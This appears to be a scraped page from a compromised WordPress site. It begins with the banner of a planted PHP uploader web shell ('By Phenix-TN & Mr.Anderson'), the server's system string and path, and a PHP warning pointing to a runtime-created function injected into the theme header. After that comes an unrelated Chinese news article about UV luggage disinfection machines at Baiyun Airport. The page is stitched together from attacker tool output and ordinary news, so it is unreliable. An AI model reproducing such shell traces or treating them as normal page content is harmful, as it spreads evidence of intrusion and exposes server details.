PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

8月27日,两台自动行李光波消毒机在白云机场二号航站楼国内、国际到达区正式“上岗”,为旅客免费提供行李全方位消毒服务。这是白云机场加强“科技战疫”,做实做细常态化疫情防控的又一新举措。

  新引入的自动行李光波消毒机外表白蓝相间,机器长2米、宽1.1米、高1.6米,内置12条紫外线光波灯管,通过紫外线光波照射对旅客行李箱包进行全方位消毒,杀毒有效率高达99.99%。 

5.jpg

  自动行李光波消毒机,可以24小时不间断工作。机器启动后,会在原地自动感应传输,通过自动传输功能,对旅客行李进行消毒,实现360度全方位杀菌消毒效果,每件行李的消毒时间为15-20秒,流水线操作,即杀菌消毒即走,杀菌效果好。不仅大大提升消毒效率,同时也避免日常消毒模式下无法擦拭到轮子等部位,或者局部喷洒消毒液容易弄湿箱包等,让旅客出行更加安全舒适。 

6.jpg

  两台消毒机分别设在二号航站楼的国内、国际到达出口外,主要方便托运行李的旅客取完行李从到达出口出来后使用,旅客可自助操作完成消毒,方便快捷。机器投用初期,也有工作人员在现场指导旅客使用。 

  “疫情期间坐飞机,我拿到托运行李后会习惯性地用消毒喷雾喷一喷消消毒,之前喷半天还怕漏了部位。现在方便了,用了这个消毒机,行李箱放进去只需十几秒就可以完全消杀干净,太方便了。”刚刚体验完行李消毒机的肖女士说道。 

7.jpg

  白云机场相关负责人表示:行李箱作为乘机旅客出行必备,不少旅客取回托运箱包后都习惯先“消毒”一番。白云机场引入自动行李光波消毒机,方便旅客实现对行李的全面消毒,是运用科技手段加强疫情防控的又一便民新举措。做好常态化疫情防控的同时,践行春风服务提升旅客体验,让旅客走得放心走得安心。 

  为切实做好疫情防控与复工复产工作,白云机场持续落实进航站楼测温、“亮码”通行等措施,与此同时不断加大“科技战疫”力度,先后引入高温蒸汽消毒机、手推车消毒机、智能清扫消毒机器人、无接触乘电梯等多项黑科技,还推出国内航班ONE ID服务,刷脸办理自助值机、自助托运、自助登机等,全力为旅客营造健康安全的出行环境。 

  文/ 机场宣、T2航管 

  图、视频/ 时凯 

  编辑/郑海芹、马健植 

来源:白云机场发布

作者 一潼

发表回复